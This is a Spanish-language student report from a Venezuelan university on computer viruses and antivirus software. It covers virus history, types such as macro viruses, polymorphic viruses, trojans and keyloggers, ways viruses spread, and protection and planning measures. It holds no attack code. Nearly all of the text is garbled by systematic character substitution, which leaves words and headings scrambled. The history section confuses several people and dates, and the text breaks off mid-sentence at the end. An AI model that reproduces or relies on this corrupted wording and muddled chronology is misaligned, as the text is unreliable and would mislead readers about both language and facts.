MINISTERIO DEL PODER POPULAR PARA LA EDUCACIN UNIVERSITARIA
UNIVERSIDAD POLITCNICA TERRITORIAL DEL NORTE DEL TCHIRA MANUELA SENZ LA FRA, ESTADO TCHIRA VIRUS Y ANTIVIRUS TSU: Nori!" Ro#"$# Cri#%o&'r (o#) C*I*: V+ ,-*./-*0,1 IN2 3 I3&or45%i6" Pro&* I3!* (o#) 2o375$7 T8M9 LA FRA, NOVIEMBRE DEL 91,: INTRODUCCIN El primer virus que atac a una mquina IBM Serie 360 (y reconocido como tal), ue llamado !reeper, creado en "#$% por &o'ert ()omas Morris* Este pro+rama emit,a peridicamente en la pantalla el mensa-e. /I0m a creeper*** catc) me i you can1/ (Soy una enredadera, a+rrenme si pueden)* 2ara eliminar este pro'lema se cre el primer pro+rama antivirus denominado &eaper (se+adora)* Sin em'ar+o, el t3rmino virus no se adoptar,a )asta "#45, pero 3stos ya e6ist,an desde antes* Sus inicios ueron en los la'oratorios de Bell !omputers* (res pro+ramadores desarrollaron un -ue+o llamado !ore 7ars, el cual consist,a en ocupar toda la memoria &8M del equipo contrario en el menor tiempo posi'le* 9espu3s de "#45, los virus )an tenido una +ran e6pansin, desde los que atacan los sectores de arranque de dis:ettes )asta los que se ad-untan en un correo electrnico y se ocultan en un ormato de ima+en comprimida con la e6tensin ;2<* 8 continuacin se presenta una 'reve cronolo+,a de lo que )a sido los or,+enes de los virus. "#5#. Se da el primer indicio de deinicin de virus* ;o)n =on >eumann (considerado el ;ulio =erne de la inormtica), e6pone su /(eor,a y or+ani?acin de un autmata complicado/* >adie pod,a sospec)ar de la repercusin de dic)o art,culo* "#@#. En los la'oratorios 8(A( Bell, se inventa el -ue+o /<uerra >uclear/ (!ore 7ars) o +uerra de nBcleos* !onsist,a en una 'atalla entre los cdi+os de dos pro+ramadores, en la que cada -u+ador desarrolla'a un pro+rama cuya misin era la de acaparar la m6ima memoria posi'le mediante la reproduccin de s, mismo* "#$0. >ace /!reeper/ que es diundido por la red 8&28>E(* El virus mostra'a el mensa-e /SCD !&EE2E&*** E8(&F28ME SI 2GE9ES1/* Ese mismo aHo es creado su ant,doto. El antivirus &eaper cuya misin era 'uscar y destruir a /!reeper/* "#$5. El virus &a''it )ac,a una copia de s, mismo y lo situa'a dos veces en la cola de e-ecucin del 8S2 de IBM lo que causa'a un 'loqueo del sistema* "#40. Ia red 8&28>E( es inectada por un /+usano/ y queda $% )oras uera de servicio* Ia ineccin ue ori+inada por &o'ert (appan Morris, un -oven estudiante de inormtica de %3 aHos que se+Bn 3l, todo se produ-o por un accidente* "#43. El -ue+o !ore 7ars, con adeptos en el MI(, sali a la lu? pB'lica en un discurso de Jen ()ompson 9eKdney que e6plica los t3rminos de este -ue+o* Ese mismo aHo aparece el concepto virus tal como lo entendemos )oy* "#4@. 9eKdney intenta enmendar su error pu'licando otro art,culo /;ue+os de !omputadora virus, +usanos y otras pla+as de la <uerra >uclear atentan contra la memoria de los ordenadores/* "#4$. Se da el primer caso de conta+io masivo de computadoras a trav3s del /MacMa+/ tam'i3n llamado /2eace =irus/ so're computadoras Macintos)* Este virus ue creado por &ic)ard BrandoK y 9reK 9avison y lo incluyeron en un disco de -ue+os que repartieron en una reunin de un clu' de usuarios* Gno de los asistentes, Marc !anter, consultor de 8ldus !orporation, se llev el disco a !)ica+o y contamin la computadora en la que reali?a'a prue'as con el nuevo sotKare 8ldus Lree)and* El virus contamin el disco maestro que ue enviado a la empresa a'ricante que comerciali? su producto inectado por el virus* Se descu're la primera versin del virus /=iernes "3/ en los ordenadores de la Gniversidad Me'rea de ;erusal3n* "#44. El virus /Brain/ creado por los )ermanos Basit y 8lvi 8m-ad de 2a:istn aparece en Estados Gnidos* VIRUS DE COMPUTADORA En inormtica, un virus de computadora es un pro+rama malicioso desarrollado por pro+ramadores que inecta un sistema para reali?ar al+una accin determinada* 2uede daHar el sistema de arc)ivos, ro'ar o secuestrar inormacin o )acer copias de si mismo e intentar esparcirse a otras computadoras utili?ando diversos medios* Ios virus pueden clasiicarse de acuerdo a su orma de transmisin y de acuerdo al daHo que ocasionan al computador CARACTERISTICAS 9ado que una caracter,stica de los virus es el consumo de recursos, los virus ocasionan pro'lemas tales como. p3rdida de productividad, cortes en los sistemas de inormacin o daHos a nivel de datos* Gna de las caracter,sticas es la posi'ilidad que tienen de diseminarse por medio de replicas y copias* Ias redes en la actualidad ayudan a dic)a propa+acin cuando 3stas no tienen la se+uridad adecuada* Ctros daHos que los virus producen a los sistemas inormticos son la p3rdida de inormacin, )oras de parada productiva, tiempo de reinstalacin, etc* May que tener en cuenta que cada virus plantea una situacin dierente* METODO DE PROPA2ACIN E6isten dos +randes clases de conta+io* En la primera, el usuario, en un momento dado, e-ecuta o acepta de orma inadvertida la instalacin del virus* En la se+unda, el pro+rama malicioso actBa replicndose a trav3s de las redes* En este caso se )a'la de +usanos* En cualquiera de los dos casos, el sistema operativo inectado comien?a a surir una serie de comportamientos anmalos o imprevistos* 9ic)os comportamientos pueden dar una pista del pro'lema y permitir la recuperacin del mismo* 9entro de las contaminaciones ms recuentes por interaccin del usuario estn las si+uientes. Mensa-es que e-ecutan automticamente pro+ramas (como el pro+rama de correo que a're directamente un arc)ivo ad-unto)* In+enier,a social , mensa-es como e-ecute este pro+rama y +ane un premio, o, ms comBnmente. Ma? % clics y +ana % tonos para mvil +ratis* Entrada de inormacin en discos de otros usuarios inectados* Instalacin de sotKare modiicado o de dudosa procedencia* En el sistema 7indoKs puede darse el caso de que la computadora pueda inectarse sin nin+Bn tipo de intervencin del usuario (versiones 7indoKs %000, N2 y Server %003) por virus como Blaster, Sasser y sus variantes por el simple )ec)o de estar la mquina conectada a una red o a Internet* Este tipo de virus aprovec)an una vulnera'ilidad de des'ordamiento de 'uer y puertos de red para iniltrarse y conta+iar el equipo, causar inesta'ilidad en el sistema, mostrar mensa-es de error, reenviarse a otras mquinas mediante la red local o Internet y )asta reiniciar el sistema, entre otros daHos* En las Bltimas versiones de 7indoKs %000, N2 y Server %003 se )a corre+ido este pro'lema en su mayor,a* METODOS DE PROTECCIN Ios m3todos para disminuir o reducir los ries+os asociados a los virus pueden ser los denominados activos o pasivos* A6%i;o# 8ntivirus. son pro+ramas que tratan de descu'rir las tra?as que )a de-ado un sotKare malicioso, para detectarlo y eliminarlo, y en al+unos casos contener o parar la contaminacin* (ratan de tener controlado el sistema mientras unciona parando las v,as conocidas de ineccin y notiicando al usuario de posi'les incidencias de se+uridad* 2or e-emplo, al verse que se crea un arc)ivo llamado Win32.EXE.vbs en la carpeta C:\Windows\%System32%\ en se+undo plano, ve que es comportamiento sospec)oso, salta y avisa al usuario* Liltros de ic)eros. consiste en +enerar iltros de ic)eros daHinos si el computador est conectado a una red* Estos iltros pueden usarse, por e-emplo, en el sistema de correos o usando t3cnicas de ireKall* En +eneral, este sistema proporciona una se+uridad donde no se requiere la intervencin del usuario, puede ser muy eica?, y permitir emplear Bnicamente recursos de orma ms selectiva* P"#i;o# Evitar introducir a tu equipo medios de almacenamiento e6tra,'les que consideres que pudieran estar inectados con al+Bn virus* >o instalar sotKare /pirata/, pues puede tener dudosa procedencia* >o a'rir mensa-es provenientes de una direccin electrnica desconocida* >o aceptar eOmails de desconocidos* Inormarse y utili?ar sistemas operativos ms se+uros* >o a'rir documentos sin ase+urarnos del tipo de arc)ivo* 2uede ser un e-ecuta'le o incorporar macros en su interior* TIPOS DE VIRUS FORMA DE TRANSMISIN Vir<# r#i=3% !omo su nom're lo indica, esta clase de virus poseen la particularidad de poder ocultarse en sectores de la memoria &8M del equipo y residir all,, controlando cualquier operacin de entrada o salida de datos que lleve a ca'o el sistema operativo* Su principal misin es la de inectar todos los arc)ivos y pro+ramas que puedan ser llamados para su e-ecucin, ya sea para su copia, 'orrado o toda otra operacin que pueda ser reali?ada con ellos* Mientras permanecen ocultos en la &8M de nuestra computadora, yacen latentes a la espera de cualquier evento que )aya sido pro+ramado por su desarrollador para comen?ar con su ataque* Esta reaccin puede ser desencadenada, por e-emplo, al )a'erse cumplido un lapso de tiempo en una ec)a u )ora prevista* Vir<# = "66i>3 =ir6%" Ia caracter,stica undamental que deine a los virus de tipo de 8ccin 9irecta es que no necesitan permanecer residentes en la memoria &8M de la computadora, ya que su m3todo para comen?ar con su ataque es esperar que se cumpla una determinada condicin para activarse y poder replicarse y reali?ar la tarea para la cual ueron conce'idos* 2ara poder lo+rar su ineccin, esta clase de virus reali?a una 'Bsqueda de todos los arc)ivos e6istentes en su directorio* 8dems poseen la particularidad de 'uscar en los directorios que se listan en la l,nea 28(M de la coni+uracin del sistema* Este tipo de virus poseen la particularidad de, tras una ineccin de arc)ivos, estos ic)eros pueden ser por completo restaurados, volviendo al estado anterior a su ineccin* Vir<# = #o?r#6ri%<r" Ios virus del tipo de so'reescritura poseen la )a'ilidad de destruir todo o parte del contenido de un arc)ivo inectado por 3l, ya que cuando un ic)ero es inectado por el virus, este escri'e datos dentro del mismo, de-ando a este arc)ivo total o parcialmente inBtil* Gna caracter,stica que deine a este tipo de virus inormtico, es que los arc)ivos no aumentarn de tamaHo en caso de una ineccin, esto es de'ido a que el virus oculta su cdi+o reempla?ando parte del cdi+o propio del arc)ivo inectado* Este es uno de los virus ms per-udiciales que circulan en la actualidad* Iamenta'lemente una de las pocas ormas que e6isten de erradicar el virus, es eliminado el arc)ivo inectado, con la consi+uiente p3rdida de los datos escritos en 3l* Vir<# = %i@o = ?oo% o "rr"3A< El sector de arranque o tam'i3n conocido por MB& (Master Boot &ecord), es una ?ona del disco r,+ido donde reside el pro+rama de inicio del sistema operativo* Ia clase de virus que ataca el sector de arranque no inectarn arc)ivos, sino que su misin principal es replicarse en cualquier otro disco r,+ido que se encuentre a su alcance* Se trata de un virus del tipo residente, ya que cuando el mismo se encuentra activo en la memoria, uno de los aspectos ms importantes al momento de determinar su e6istencia, es el notorio decaimiento de las ciras que arro-a cualquier conteo de la memoria li're del sistema* Sin em'ar+o, el cdi+o del virus no incorpora nin+una clase de rutina per-udicial, salvo la propia replicacin del mismo* Vir<# = 4"6ro El principal motivo de creacin de estos virus es la de poder inectar a todos aquellos arc)ivos que ten+an la posi'ilidad de e-ecutar macros* Estas macros son pequeHas aplicaciones destinadas a acilitar la tarea del usuario mediante la automati?acin de ciertas y comple-as operaciones que de otro modo ser,an demasiado tediosas de llevar a ca'o* Estos microOpro+ramas, al contener cdi+o e-ecuta'le, tam'i3n son propensos, o'viamente, a contener virus* El m3todo de ineccin del cual )acen uso los virus de esta ,ndole es simple, una ve? car+ado el arc)ivo, estas macros se car+arn en memoria y el cdi+o se e-ecutar produci3ndose de esta orma la ineccin* !a'e destacar que +ran parte de estas aplicaciones cuentan con una proteccin incorporada para esta clase de amena?as, si 'ien no siempre es eectiva* 8dems lo cierto es que la mayor,a de estos virus no puede atacar a todas las aplicaciones por i+ual, de'ido a que su cdi+o est escrito para atacar a un pro+rama en particular* Ios e-emplos ms importantes de esta clase de ic)eros son los documentos +enerados por Microsot 7ord, cuya e6tensin es doc, como as, tam'i3n los arc)ivos de Microsot E6cel, cuyas )o-as de clculo poseen la e6tensin 6ls, los ic)eros de 8ccess con e6tensin M9B, las presentaciones de Microsot 2oKer2oint, y al+unos ic)eros reali?ados por !orel9raK entre otros* Vir<# = 3$"6# Este tipo de virus tiene la acultad de modiicar las direcciones espec,icas de u'icacin de pro+ramas y arc)ivos para comen?ar su ineccin, es decir, los lu+ares en donde el sistema operativo 'uscar estos pro+ramas o arc)ivos para su e-ecucin* El m3todo de ineccin utili?ado por este virus, como mencionamos, es alterar la u'icacin de un determinado pro+rama o arc)ivo* 8l momento de que el sistema operativo o el usuario del mismo necesite e-ecutar este pro+rama o ic)ero inectado, lo que en realidad sucede es la e-ecucin del cdi+o malicioso que porta el virus, produci3ndose de este modo la ineccin de cualquier pro+rama con e6tensin e6e o com* !a'e destacar que cuando se produce una ineccin por virus de tipo de enlace, resulta prcticamente imposi'le la locali?acin de los pro+ramas que )an sido reempla?ados por el accionar de los mismos* Vir<# = 36ri@6i>3 Ios desarrolladores de esta peculiar clase de virus utili?an el m3todo de cirado por encriptacin para lo+rar el o'-etivo de no ser descu'iertos por las e6ploraciones que reali?an las aplicaciones antivirus* Si 'ien no se trata estrictamente de un tipo de virus, es una denominacin que se le otor+a a cierta clase de t3cnica utili?ada para el ocultamiento de los mismos* Esta denominacin tam'i3n es e6tensi'le a virus de otras cate+or,as, tales como los virus de tipo polirmico* Ios virus de tipo de encriptacin, tienen la capacidad de autoencriptarse, ocultndose de este modo a los intentos de los pro+ramas antivirus cuando reali?an sus rutinas de escaneo del sistema* 2ara cumplir con la misin encomendada por su pro+ramador, el virus de encriptacin se autodesencriptar y una ve? inali?ada su tarea volver a su anterior estado, es decir, se encriptar a s, mismo* 2ara acometer con su ineccin, los virus encriptados incorporan a su cdi+o los al+oritmos necesarios para su cirado y descirado, de'ido a que el cirado es una t3cnica que necesita de una clave para encriptarlo y desencriptarlo, la cual o'viamente no posee el usuario que )a sido inectado* !a'e destacar que esta clase de virus slo pueden ser descu'iertos por los pro+ramas antivirus cuando se encuentran en e-ecucin* Vir<# @o$i4>r&i6o# Ios virus polimricos, una t3cnica muy soisticada y que demanda muc)o conocimiento por parte del desarrollador, son aquellos que poseen la )a'ilidad de encriptarse de un modo dierente y varia'le con cada nueva ineccin que reali?an* Su principal caracter,stica consiste en que con cada replicacin, utili?an dierentes claves y al+oritmos de encriptacin, de modo que las cadenas que componen su cdi+o, una especie de irma para los sistemas antivirus, var,an de tal orma que nunca lo+rarn concordar con las irmas e6istentes en las 'ases de datos que utili?an estos antivirus para su deteccin* 9e'ido a la utili?acin de esta complicada t3cnica, estos virus son capaces de +enerar +ran cantidad de copias de s, mismos, pero nunca i+uales* Vir<# = %i@o 4<$%i@"r%i% 2odemos considerar, de'ido a los estudios y tra'a-os reali?ados por e6pertos en inormtica en todo el mundo, que este tipo de virus es actualmente uno de los ms per-udiciales que cualquier usuario, tanto e6perto como novato, puede encontrar* Estos virus de'en su peli+rosidad al )ec)o de que pueden reali?ar, mediante la utili?acin con-unta de dierentes t3cnicas y m3todos de ataque, mBltiples y variadas inecciones* El o'-etivo principal de su e6istencia, es la posi'ilidad de destruir con su cdi+o a todos aquellos arc)ivos y pro+ramas e-ecuta'les que ten+a la posi'ilidad de inectar* Entre los 'lancos preeridos de esta clase de virus podemos citar arc)ivos, pro+ramas y aplicaciones, las macros que incorporan suites de oimtica como Microsot Cice, discos r,+idos, unidades de almacenamiento e6tra,'les tales como dis:ettes, pendrives y memorias de todo tipo* !a'e destacar que tras el ataque de un virus de tipo multipartite, los datos que contienen los elementos inectados sern imposi'les de recuperar* TIPO DE DABO Vir<# = Boo% Gno de los primeros tipos de virus conocido, el virus de 'oot inecta la particin de iniciali?acin del sistema operativo* El virus se activa cuando la computadora es encendida y el sistema operativo se car+a* Ti4 Bo4? o Bo4?" = Ti4@o Ios virus del tipo P'om'a de tiempoQ son pro+ramados para que se activen en determinados momentos, deinido por su creador* Gna ve? inectado un determinado sistema, el virus solamente se activar y causar al+Bn tipo de daHo el d,a o el instante previamente deinido* 8l+unos virus se )icieron amosos, como el P=iernes "3R y el PMic)elan+eloQ* Lo4?ri6#, Cor4 o !<#"3o# !on el inter3s de )acer un virus pueda esparcirse de la orma ms amplia posi'le, sus creadores a veces, de-aron de lado el )ec)o de daHar el sistema de los usuarios inectados y pasaron a pro+ramar sus virus de orma que slo se repliquen, sin el o'-etivo de causar +raves daHos al sistema* 9e esta orma, sus autores tratan de )acer sus creaciones ms conocidas en internet* Este tipo de virus pas a ser llamado +usano o Korm* Son cada ve? ms perectos, )ay una versin que al atacar la computadora, no slo se replica, sino que tam'i3n se propa+a por internet enviandose a los eOmail que estn re+istrados en el cliente de eOmail, inectando las computadoras que a'ran aquel eOmail, reiniciando el ciclo* TroD"3o# o 6"?"$$o# = TroD" !iertos virus traen en su interior un cdi+o aparte, que le permite a una persona acceder a la computadora inectada o recolectar datos y enviarlos por Internet a un desconocido, sin que el usuario se de cuenta de esto* Estos cdi+os son denominados (royanos o ca'allos de (roya* Inicialmente, los ca'allos de (roya permit,an que la computadora inectada pudiera reci'ir comandos e6ternos, sin el conocimiento del usuario* 9e esta orma el invasor podr,a leer, copiar, 'orrar y alterar datos del sistema* 8ctualmente los ca'allos de (roya 'uscan ro'ar datos conidenciales del usuario, como contraseHas 'ancarias* Ios virus eran en el pasado, los mayores responsa'les por la instalacin de los ca'allos de (roya, como parte de su accin, pues ellos no tienen la capacidad de replicarse* 8ctualmente, los ca'allos de (roya ya no lle+an e6clusivamente transportados por virus, a)ora son instalados cuando el usuario 'a-a un arc)ivo de Internet y lo e-ecuta* 2rctica eica? de'ido a la enorme cantidad de eOmails raudulentos que lle+an a los 'u?ones de los usuarios* (ales eOmails contienen una direccin en la Ke' para que la v,ctima 'a-e, sin sa'er, el ca'allo de (roya, en ve? del arc)ivo que el mensa-e dice que es* Esta prctica se denomina p)is)in+, e6presin derivada del ver'o to is), PpescarQ en in+l3s* 8ctualmente, la mayor,a de los ca'allos de (roya simulan Ke's 'ancarias, PpescandoQ la contraseHa tecleada por los usuarios de las computadoras inectadas* E6isten distintas ormas para sa'er si ests inectado con un troyano y cmo eliminarlo de tu 2!* HiE"6Fr# Ios )i-ac:ers son pro+ramas o scripts que PsecuestranQ nave+adores de Internet, principalmente el Internet E6plorer* !uando eso pasa, el )i-ac:er altera la p+ina inicial del nave+ador e impide al usuario cam'iarla, muestra pu'licidad en popOups o ventanas nuevas, instala 'arras de )erramientas en el nave+ador y pueden impedir el acceso a determinadas Ke's (como Ke's de sotKare antiv,rus, por e-emplo)* GD$o!!r El JeyIo++er es una de las especies de virus e6istentes, el si+niicado de los t3rminos en in+l3s que ms se adapta al conte6to ser,a. !apturador de teclas* Iue+o que son e-ecutados, normalmente los :eylo++ers quedan escondidos en el sistema operativo, de manera que la v,ctima no tiene como sa'er que est siendo monitori?ada* 8ctualmente los :eylo++ers son desarrollados para medios il,citos, como por e-emplo ro'o de contraseHas 'ancarias* Son utili?ados tam'i3n por usuarios con un poco ms de conocimiento para poder o'tener contraseHas personales, como de cuentas de email, MS>, entre otros* E6isten tipos de :eylo++ers que capturan la pantalla de la v,ctima, de manera de sa'er, quien implant el :eylo++er, lo que la persona est )aciendo en la computadora* !mo los :eylo++er nos ro'an la inormacinS !mo cuidarseS Zo4?i El estado ?om'ie en una computadora ocurre cuando es inectada y est siendo controlada por terceros* 2ueden usarlo para diseminar virus , :eylo++ers, y procedimientos invasivos en +eneral* Gsualmente esta situacin ocurre porque la computadora tiene su LireKall yTo sistema operativo desatuali?ado* Se+Bn estudios, una computadora que est en internet en esas condiciones tiene casi un @0U de c)ances de convertirse en una mquina ?om'ie, pasando a depender de quien la est controlando, casi siempre con ines criminales* Vir<# = M"6ro Ios virus de macro (o macro virus) vinculan sus acciones a modelos de documentos y a otros arc)ivos de modo que, cuando una aplicacin car+a el arc)ivo y e-ecuta las instrucciones contenidas en el arc)ivo, las primeras instrucciones e-ecutadas sern las del virus* Ios virus de macro son parecidos a otros virus en varios aspectos. son cdi+os escritos para que, 'a-o ciertas condiciones, este cdi+o se Preprodu?caQ, )aciendo una copia de 3l mismo* !omo otros virus, pueden ser desarrollados para causar daHos, presentar un mensa-e o )acer cualquier cosa que un pro+rama pueda )acer* N<;o# 4=io# Muc)o se )a'la de prevencin contra virus inormticos en computadoras personales, la amosa 2!, pero poca +ente sa'e que con la evolucin )oy e6isten muc)os dispositivos que tienen acceso a internet, como tel3onos celulares, )and)elds, tel3onos =CI2, etc* May virus que pueden estar atacando y per-udicando la perormance de estos dispositivos en cuestin* 2or el momento son casos aislados, pero el temor entre los especialistas en se+uridad di+ital es que con la propa+acin de una inmensa cantidad de dispositivos con acceso a internet, los )ac:ers se van a empe?ar a interesar cada ve? ms por atacar a estos nuevos medios de acceso a internet* (am'i3n se vio recientemente que los virus pueden lle+ar a productos electrnicos deectuosos, como pas recientemente con i2C9S de 8pple, que tra,an un PinoensivoQ virus (cualquier antiv,rus lo elimina, antes de que 3l elimine al+unos arc)ivos contenidos en el i2C9)* ACCIONES DE LOS VIRUS 8l+unas de las acciones de al+unos virus son. Gnirse a un pro+rama instalado en el computador permitiendo su propa+acin* Mostrar en la pantalla mensa-es o im+enes )umor,sticas, +eneralmente molestas* &alenti?ar o 'loquear el computador* 9estruir la inormacin almacenada en el disco, en al+unos casos vital para el sistema, que impedir el uncionamiento del equipo* &educir el espacio en el disco* Molestar al usuario cerrando ventanas, moviendo el ratn* ANTIVIRUS En inormtica los "3%i;ir<# son pro+ramas cuyo o'-etivo es detectar yTo eliminar virus inormticos* >acieron durante la d3cada de "#40* !on el transcurso del tiempo, la aparicin de sistemas operativos ms avan?ados e Internet, )a )ec)o que los antivirus )ayan evolucionado )acia pro+ramas ms avan?ados que no slo 'uscan detectar virus inormticos, sino 'loquearlos, desinectar arc)ivos y prevenir una ineccin de los mismos, y actualmente ya son capaces de reconocer otros tipos de malKare, como spyKare,+usanos, troyanos, root:its, etc* METODO DE CONTA2IO E6isten dos +randes +rupos de propa+acin. los virus cuya instalacin el usuario en un momento dado e-ecuta o acepta de orma inadvertida, o los +usanos, con los que el pro+rama malicioso actBa replicndose a trav3s de las redes* En cualquiera de los dos casos, el sistema operativo inectado comien?a a surir una serie de comportamientos anmalos o no previstos* 9ic)os comportamientos son los que dan la tra?a del pro'lema y tienen que permitir la recuperacin del mismo* 9entro de las contaminaciones ms recuentes por interaccin del usuario estn las si+uientes. Mensa-es que e-ecutan automticamente pro+ramas (como el pro+rama de correo que a're directamente un arc)ivo ad-unto)* In+enier,a social, mensa-es como. VE-ecute este pro+rama y +ane un premioW* Entrada de inormacin en discos de otros usuarios inectados* Instalacin de sotKare que pueda contener uno o varios pro+ramas maliciosos* Gnidades e6tra,'les de almacenamiento (GSB)* SE2URIDAD Y METODOS DE PROTECCION Ios m3todos para contener o reducir los ries+os asociados a los virus pueden ser los denominados activos o pasivos* Ti@o# = ;"6<3"# S>$o =%66i>3. son vacunas que slo actuali?an arc)ivos inectados, sin em'ar+o, no pueden eliminarlos o desinectarlos* D%66i>3 D =#i3&66i>3. son vacunas que detectan arc)ivos inectados y que pueden desinectarlos* D%66i>3 D "?or%o = $" "66i>3. son vacunas que detectan arc)ivos inectados y detienen las acciones que causa el virus* Co4@"r"6i>3 @or &ir4"#. son vacunas que comparan las irmas de arc)ivos sospec)osos para sa'er si estn inectados* Co4@"r"6i>3 = &ir4"# = "r6'i;o. son vacunas que comparan las irmas de los atri'utos +uardados en tu equipo* Por 4)%o=o# '<rH#%i6o#. son vacunas que usan m3todos )eur,sticos para comparar arc)ivos* I3;o6"=o @or $ <#<"rio. son vacunas que se activan instantneamente con el usuario* I3;o6"=o @or $" "6%i;i="= =$ #i#%4". son vacunas que se activan instantneamente por la actividad del sistema operativo* Co@i"# = #!<ri="= I@"#i;oJ Mantener una pol,tica de copias de se+uridad +aranti?a la recuperacin de los datos y la respuesta cuando nada de lo anterior )a uncionado* 8simismo, las empresas de'er,an disponer de un plan y detalle de todo el sotKare instalado para tener un plan de contin+encia en caso de pro'lemas* PLANIFICACION Ia planiicacin consiste en tener preparado un plan de contin+encia en caso de que una emer+encia de virus se produ?ca, as, como disponer al personal de la ormacin adecuada para reducir al m6imo las acciones que puedan presentar cualquier tipo de ries+o* !ada antivirus puede planear la deensa de una manera, es decir, un antivirus puede )acer un escaneado completo, rpido o de vulnera'ilidad se+Bn eli-a el usuario* Co3#i=r"6io3# = #o&%C"r El sotKare es otro de los elementos clave en la parte de planiicacin* Se de'er,a tener en cuenta la si+uiente lista de compro'aciones para tu se+uridad. 1. (ener el sotKare imprescindi'le para el uncionamiento de la actividad, nunca menos pero tampoco ms* (ener controlado al personal en cuanto a la instalacin de sotKare es una medida que va impl,cita* 8simismo tener controlado el sotKare ase+ura la calidad de la procedencia del mismo (no de'er,a permitirse sotKare pirata o sin +arant,as)* En todo caso un inventario de sotKare proporciona un m3todo correcto de ase+urar la reinstalacin en caso de desastre* %* 9isponer del sotKare de se+uridad adecuado* !ada actividad, orma de tra'a-o y m3todos de cone6in a Internet requieren una medida dierente de apro6imacin al pro'lema* En +eneral, las soluciones dom3sticas, donde Bnicamente )ay un equipo e6puesto, no son las mismas que las soluciones empresariales* 3* M3todos de instalacin rpidos* 2ara permitir la reinstalacin rpida en caso de contin+encia* 5* 8se+urar licencias* 9eterminados sotKares imponen m3todos de instalacin de una ve?, que diicultan la reinstalacin rpida de la red* 9ic)os pro+ramas no siempre tienen alternativas pero )a de 'uscarse con el a'ricante m3todos rpidos de instalacin* @* Buscar alternativas ms se+uras* E6iste sotKare que es amoso por la cantidad de a+u-eros de se+uridad que introduce* Es imprescindi'le conocer si se puede encontrar una alternativa que proporcione i+uales uncionalidades pero permitiendo una se+uridad e6tra* Co3#i=r"6io3# = $" r= 9isponer de una visin clara del uncionamiento de la red permite poner puntos de veriicacin de iltrado y deteccin a), donde la incidencia es ms claramente identiica'le* Sin perder de vista otros puntos de accin es conveniente. "* Mantener al m6imo el nBmero de recursos de red en modo de slo lectura* 9e esta orma se impide que computadoras inectadas los propa+uen* 2. !entrali?ar los datos* 9e orma que detectores de virus en modo 'atc) puedan tra'a-ar durante la noc)e* 3. &eali?ar iltrados de ireKall de red* Eliminar los pro+ramas que comparten datos, como pueden ser los 2%2X Mantener esta pol,tica de orma ri+urosa, y con el consentimiento de la +erencia* 5* &educir los permisos de los usuarios al m,nimo, de modo que slo permitan el tra'a-o diario* @* !ontrolar y monitori?ar el acceso a Internet* 2ara poder detectar en ases de recuperacin cmo se )a introducido el virus, y as, determinar los pasos a se+uir* For4"6i>3: D$ <#<"rio Esta es la primera 'arrera de proteccin de la red* A3%i;ir<# Es conveniente disponer de una licencia activa de antivirus* 9ic)a licencia se emplear para la +eneracin de discos de recuperacin y emer+encia* Sin em'ar+o, no se recomienda en una red el uso continuo de antivirus* El motivo radica en la cantidad de recursos que dic)os pro+ramas o'tienen del sistema, reduciendo el valor de las inversiones en )ardKare reali?adas* 8unque si los recursos son suicientes, este e6tra de se+uridad puede ser muy Btil* Sin em'ar+o, los iltros de correos con detectores de virus son imprescindi'les, ya que de esta orma se ase+urar una reduccin importante de elecciones de usuarios no entrenados que pueden poner en ries+o la red* Ios virus ms comunes son los troyanos y +usanos, los cuales ocultan tu inormacin, creando 8ccesos 9irectos* FirC"$$# Liltrar contenidos y puntos de acceso* Eliminar pro+ramas que no est3n relacionados con la actividad* (ener monitori?ado los accesos de los usuarios a la red, permite asimismo reducir la instalacin de sotKare que no es necesario o que puede +enerar ries+o para la continuidad del ne+ocio* Su si+niicado es 'arrera de ue+o y no permite que otra persona no autori?ada ten+a acceso desde otro equipo al tuyo* R4@$"7o = #o&%C"r Ios puntos de entrada en la red la mayor,a de las veces son el correo, las p+inas 7EB, y la entrada de ic)eros desde discos, o de computadoras que no estn en la empresa (porttiles) Muc)as de estas computadoras emplean pro+ramas que pueden ser reempla?ados por alternativas ms se+uras* Es conveniente llevar un se+uimiento de cmo distri'uyen 'ancos, y e6ternos el sotKare, valorar su utilidad* C3%r"$i7"6i>3 D ?"6F<@ Ia centrali?acin de recursos y +aranti?ar el 'ac:up de los datos es otra de las pautas undamentales en la pol,tica de se+uridad recomendada* Ia +eneracin de inventarios de sotKare, centrali?acin del mismo y la capacidad de +enerar instalaciones rpidas proporcionan m3todos adicionales de se+uridad* Es importante tener locali?ado dnde se sitBa la inormacin en la empresa* 9e esta orma podemos reali?ar las copias de se+uridad de orma adecuada* !ontrol o separacin de la inormtica mvil, dado que esta est ms e6puesta a las contin+encias de virus* E4@$o = #i#%4"# o@r"%i;o# 45# #!<ro# 2ara servir ic)eros no es conveniente disponer de los mismos sistemas operativos que se emplean dentro de las estaciones de tra'a-o, ya que toda la red en este caso est e6puesta a los mismos retos* Gna orma de prevenir pro'lemas es disponer de sistemas operativos con arquitecturas dierentes, que permitan +aranti?ar la continuidad de ne+ocio* T4"# "6r6" = $" #!<ri="= E6isten ideas instaladas por parte de las empresas de antivirus parte en la cultura popular que no ayudan a mantener la se+uridad de los sistemas de inormacin* Mi #i#%4" 3o # i4@or%"3% @"r" <3 6r"6Fr* Este tema se 'asa en la idea de que no introducir passKords se+uras en una empresa no entraHa ries+os pues YZui3n va a querer o'tener inormacin m,aS Sin em'ar+o dado que los m3todos de conta+io se reali?an por medio de pro+ramas automticos, desde unas mquinas a otras, estos no distin+uen 'uenos de malos, interesantes de no interesantes*** 2or tanto a'rir sistemas y de-arlos sin claves es acilitar la vida a los virus* E#%oD @ro%!i=o @<# 3o "?ro "r6'i;o# A< 3o 6o3o76o* Esto es also, pues e6isten mBltiples ormas de conta+io, adems los pro+ramas reali?an acciones sin la supervisin del usuario poniendo en ries+o los sistemas* Co4o %3!o "3%i;ir<# #%oD @ro%!i=o* [nicamente estoy prote+ido mientras el antivirus sepa a lo que se enrenta y como com'atirlo* En +eneral los pro+ramas antivirus no son capaces de detectar todas las posi'les ormas de conta+io e6istentes, ni las nuevas que pudieran aparecer conorme las computadoras aumenten las capacidades de comunicacin* Co4o =i#@o3!o = <3 &irC"$$ 3o 4 6o3%"!io* Esto Bnicamente proporciona una limitada capacidad de respuesta* Ias ormas de inectarse en una red son mBltiples* Gnas provienen directamente de accesos a mi sistema (de lo que prote+e un ireKall) y otras de cone6iones que reali? (de las que no me prote+e)* Emplear usuarios con altos privile+ios para reali?ar cone6iones tampoco ayuda* T3!o <3 #r;i=or C? 6<Do #i#%4" o@r"%i;o # <3 UNIK "6%<"$i7"=o " $" &6'"* 2uede que este prote+ido contra ataques directamente )acia el nBcleo, pero si al+una de las aplicaciones Ke' (2M2, 2erl, !panel, etc*) est 